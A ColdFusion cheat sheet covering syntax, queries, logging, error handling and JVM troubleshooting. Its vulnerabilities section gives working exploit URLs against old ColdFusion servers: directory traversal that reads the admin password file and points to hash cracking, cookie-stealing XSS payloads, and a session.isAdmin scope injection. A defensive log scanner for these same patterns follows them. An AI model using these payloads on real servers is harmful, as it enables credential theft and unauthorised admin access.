
ColdFusion Cheat Sheet

A reference for CF goodness.


Set variables

Use cfset to create a variable (if it doesn't exist) and assign it a value. You can also use it to call functions.

Current time

<cfset currentTime = now() />

Regular string

<cfset name = "Archi" />

Integer

<cfset age = 29 />

Concatenate variable and string

<cfset todayDate = "Today is: #now()#" />
<cfset greeting = "Hello " & name />

Array

<cfset dataArray = [dateFormat(now(), "short"), dateFormat(dateadd('d',1,now()), "short"), "Me", 42] />

Data structure

<cfset dictionary = { today = dateFormat(now(), "short"), tomorrow = dateFormat(dateadd('d', 1, now()), "short"), who = "Me", the_answer_to_life_and_everything_else = 42 } />

Arrays

Unlike in most other languages, arrays start at index 1, not 0.

Create array literal

<cfset someThings = ["Boca", "Futbol", 42] />

Constructor

<cfset sameArray = arrayNew(1) />

Adding an element at a specific index

<cfset someThings[4] = "Ruby on Rails" />

Appending

<cfset ArrayAppend(someThings, "Destiny") />

Looping over the array

<cfloop array = "#someThings#" index = "thing">
    <cfoutput>#thing#</cfoutput>
</cfloop>

Loops

There are several different types of for and while loops in ColdFusion.
For more info please see the docs for cfloop.

FOR Loop

for (i=1;i LTE ArrayLen(array);i=i+1) {
	WriteOutput(array[i]);
}

While Loop

x = 0;
while (x LT 5) {
	x = x + 1;
	WriteOutput(x);
}
//OUTPUTS 12345

Do While Loop

x = 0;
do {
 x = x+1;
 WriteOutput(x);
} while (x LTE 0);
// OUTPUTS 1

FOR IN Loop (Structure)

struct = StructNew();
struct.one = "1";
struct.two = "2";
for (key in struct) {
	WriteOutput(key);
}
//OUTPUTS onetwo

FOR IN Loop (Array)

cars = ["Ford","Dodge"];
for (car in cars) {
	WriteOutput(car);
}
//OUTPUTS FordDodge

FOR IN Loop (Query)

cars = QueryNew("make,model",
	"cf_sql_varchar,cf_sql_varchar",
	[["Ford", "T"],["Dodge","30"]]);
for (car in cars) {
	WriteOutput("Model " & car.model);
}
//OUTPUTS Model TModel 30

Structures

These are like dictionaries in Python or hashes in Ruby.

Create structure literal

<cfset aGuy = {} />
<cfset batman = {
    "first_name" = "Bruno",
    "last_name" = "Diaz",
    "age" = 42
} />

Constructor

<cfset aGuy = structNew() />

Adding elements with brackets

<cfset aGuy["first_name"] = "Ezequiel" />
<cfset aGuy["last_name"] = "Lopez" />

Adding elements with dot notation

<cfset aGuy.age = 29 />
<!--- CFML escapes a double quote inside a double-quoted string by doubling it --->
<cfset aGuy.height = "5' 11""" />

Looping over the structure

<!--- collection takes the structure itself, so it must be wrapped in pound signs --->
<cfloop collection = "#aGuy#" item = "data">
    <cfoutput>#data#: #aGuy[data]#</cfoutput>
</cfloop>

Queries

Use SQL in ColdFusion to retrieve data from a database or insert data into it.

Query

var queryOptions = { datasource: "appMain" };
var data = queryExecute(
  "SELECT * FROM users", {}, queryOptions
);

Allocate query result into variable & retrieve info

<cfquery name="firstQ" datasource="tsdata.ts24">
    SELECT * FROM TestTable
</cfquery>

Looping over the Query

<cfoutput>
    <cfloop query="#firstQ#">
        <p><i>myDataAlfa: </i>#firstQ.myDataAlfa# <i>myDataInt: </i>#firstQ.myDataInt#</p>
    </cfloop>
    
    <!--- Extra data to get from the query --->
    <p>#firstQ.columnlist#</p>
    <p>#firstQ.recordcount#</p>
</cfoutput>

Logging

Logging stuff

Clear Log

var logDir = expandPath( "/logs/" );
var logs = directoryList(
  path = logDir,
  listInfo = "name",
  filter = "*.log",
  type = "file",
  recurse = "false"
);
for( var log in logs ){
  var fullPath = logDir & log ;
  if( fileExists( fullPath ) ){
    fileDelete( fullPath );
  }
}

LogBox

component {
  // ...
  function onError( exception ){
    // Logging error with LogBox...
    writeOutput( "Writing the error in log file.." );
    logger.error(
        "An error occurred: #exception.message# #exception.detail#",
        exception
    );

    // error page
    include "views/error.cfm";
  }
}

Security

Security-related settings for Application.cfc file

Lock down APP

// Application.cfc
component {
  this.name = "myApp";
  this.blockedExtForFileUpload = "*";
  this.scriptProtect = "all";
  this.sessioncookie = {
    httpOnly: true,
    secure  : true
  };
}

Error Handling

ColdFusion provides a variety of tools to customize error information and handle errors when they occur.

Try / Catch / Throw / Finally / Rethrow

try {
	throw(message="Oops", detail="xyz");
} catch (any e) {
	WriteOutput("Error: " & e.message);
	rethrow;
	
} finally {
	WriteOutput("I run even if no error");
}

OnError Exception

  public function onError(required exception, required string eventName)
  {
    var factory = new App.ExceptionFactory();
    var e = factory.getNewException(arguments.eventName, arguments.exception);
    if (e.logError()) {
      var loggingFile = new App.SomeLoggingCfc(arguments.eventName, arguments.exception);
      loggingFile.commitLog();
    }
    if (e.debugError()) {}
    e.throwException();
  } 
  public ExceptionFactory function getNewException(required string eventName, required exception)
  {
    return new "App.#exception.type#"(argumentCollection = arguments);
  } 
  public boolean function logError() {}
  public boolean function debugError() {}
  public function throwException() {}

Output CF Error details without CFDump

<cftry>
   ...
<cfcatch>
   <cf_OutputCFCatch CFCatch="#CFCatch#" />
</cfcatch>
</cftry>

Debugging

You can use CFML tags and functions to display or hide debugging and tracing information.

Control Debugging Output

<cfsetting showDebugOutput="No">

Show Query exec.time

<cfquery name="TestQuery" datasource="cfexample" debug>
SELECT * FROM TestTable
</cfquery>

Log Values to MyAppSilentTrace.log

<cfif IsDebugMode()>
<cflog file="MyAppSilentTrace" text="Page: #cgi.script_name#,
completed query MyDBQuery; Query Execution time:
#cfquery.ExecutionTime# Status: #Application.status#">
</cfif>

Comments

ColdFusion comments have a similar format to HTML comments but use three dash characters instead of two.

Single line comment

<!--- This is a ColdFusion Comment. Browsers do not receive it. --->

Single line comment

mojo = 1; //THIS IS A COMMENT

Multiline comment

/* This is a comment
	that can span
	multiple lines
*/

Vulnerabilities

ColdFusion had a lot of security vulnerabilities in the past, so stop using older versions!

# CVE-2010-2861 - Adobe ColdFusion Unspecified Directory Traversal Vulnerability
Detailed information about the exploitation of this vulnerability: http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
1. Open the file in a browser
http://[server:port]/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
2. Copy the hashed password
#Fri Feb 07 05:48:45 PST 2020
rdspassword=
password=42DABCDFADADASASAS4891539FASDA11CA5
encrypted=true
3. Compare with rainbow tables
https://www.dcode.fr/sha1-hash

# CVE-2009-1872 - Adobe ColdFusion Server Query String Cross-Site Scripting
Detailed information about the exploitation of this vulnerability: https://www.securityfocus.com/bid/36046/info
1. Open the file in a browser
http://www.example.com:8500/CFIDE/componentutils/componentdetail.cfm?component=<body%20onload=alert(document.cookie)>
http://www.example.com:8500/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=%3Cbody%20onload=alert(document.cookie)%3E
http://www.example.com:8500/CFIDE/componentutils/cfcexplorer.cfc?method=%3Cbody%20onload=alert(document.cookie)%3E

# Adobe ColdFusion Server Scope Injection
Detailed information about the exploitation of this vulnerability: https://www.petefreitag.com/item/834.cfm
1. Open any action (that checks session.isAdmin) in a browser
http://www.example.com:8500/CFIDE/componentutils/componentdetail.cfm
2. Append the following to the URL
?session.isAdmin=1
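
A defender-side check for the three request patterns listed above, added here as an example and not part of the original cheat sheet: it scans web-server access-log lines and labels requests that match them. The log lines are constructed, and the scope-name list and the markup heuristic are assumptions to tune for your environment.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines modelled on the request patterns listed above.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Feb/2020:05:40:01 -0800] "GET /CFIDE/administrator/enter.cfm'
    '?locale=../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 512',
    '203.0.113.5 - - [07/Feb/2020:05:41:10 -0800] "GET /CFIDE/componentutils/cfcexplorer.cfc'
    '?method=%3Cbody%20onload=alert(document.cookie)%3E HTTP/1.1" 200 901',
    '198.51.100.7 - - [07/Feb/2020:05:42:33 -0800] "GET /CFIDE/componentutils/componentdetail.cfm'
    '?session.isAdmin=1 HTTP/1.1" 200 433',
    '198.51.100.9 - - [07/Feb/2020:05:43:02 -0800] "GET /index.cfm?locale=en HTTP/1.1" 200 1200',
]

# Assumed list of CFML scope names a request parameter should never start with.
SCOPE_PARAM = re.compile(
    r"^(session|application|server|request|client|cgi|cookie|variables)\.", re.I)
MARKUP = re.compile(r"<\s*\w+|\bon\w+\s*=", re.I)  # heuristic: tag open or event handler
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return the set of findings for one access-log line (empty set if clean)."""
    m = REQUEST.search(log_line)
    if not m:
        return set()
    target = urlsplit(m.group(1))
    path = target.path.lower()
    findings = set()
    # parse_qsl percent-decodes names and values, so %3C and %00 are matched decoded.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if SCOPE_PARAM.match(name):
            findings.add("scope-injection")
        if (path.startswith("/cfide/administrator/") and name.lower() == "locale"
                and ("../" in value or "..\\" in value or "\x00" in value)):
            findings.add("CVE-2010-2861")
        if path.startswith("/cfide/componentutils/") and (
                MARKUP.search(name) or MARKUP.search(value)):
            findings.add("CVE-2009-1872")
    return findings

def scan(lines):
    """Return (line_number, sorted findings) for every line with a finding."""
    return [(n, sorted(f)) for n, line in enumerate(lines, 1) if (f := classify(line))]

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(number, ", ".join(found))
```

Any hit on a /CFIDE path from outside the management network is worth investigating on its own, since the administrator and component utilities should not be reachable from the internet.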

Tricks

Tips & tricks on becoming a ColdFusion pro!

Find the Java Version Used by ColdFusion or Railo

<cfoutput>#CreateObject("java", "java.lang.System").getProperty("java.version")#</cfoutput>

Per-Application ColdFusion Mappings

<cfset this.mappings["/test"]="c:\inetpub\wwwroot\test">

Restart a ColdFusion Application

<cfset ApplicationStop() />
<cflocation url="index.cfm" addtoken="false" />

Lower Session Timeouts for Bots and Spiders

<!--- In Application.cfm: requests that send no session cookie (typical of bots) get a 2-second timeout --->
<cfif StructKeyExists(cookie, "cfid") or StructKeyExists(cookie, "jsessionid")>
    <cfset REQUEST.sessionTimeout = CreateTimeSpan(0,0,30,0) />
<cfelse>
    <cfset REQUEST.sessionTimeout = CreateTimeSpan(0,0,0,2) />
</cfif>

<!--- Use the REQUEST.sessionTimeout variable in the cfapplication tag --->

<cfapplication name="myawesomeapp"
     sessionmanagement="Yes"
     sessiontimeout="#REQUEST.sessionTimeout#">

Troubleshooting

Below are some of the most common issues that I've faced while working with older CF versions.

Wrong time zone in ColdFusion


PROBLEM: ColdFusion's now() function reports a different time than the server.

CAUSE: ColdFusion relies on Java and uses the time zone within the Java Virtual Machine (JVM) that ColdFusion runs on.
 

SOLUTION: Add the following JVM Argument

-Duser.timezone=Europe/Belgrade
*Where Europe/Belgrade is your timezone ID

ColdFusion Application keeps dying


PROBLEM: ColdFusion application breaks with the following error: Out-of-Memory error (OOME)

CAUSE: -XX:PermSize & -XX:MaxPermSize are used to set the size of the Permanent Generation (where compiled classes and JSP pages are kept). If this space is full, it triggers a Full Garbage Collection, and if that fails to expand the Permanent Space, the JVM will crash.

SOLUTION: Add the following JVM Argument

-XX:MaxPermSize=512m
*Where 512m stands for 512MB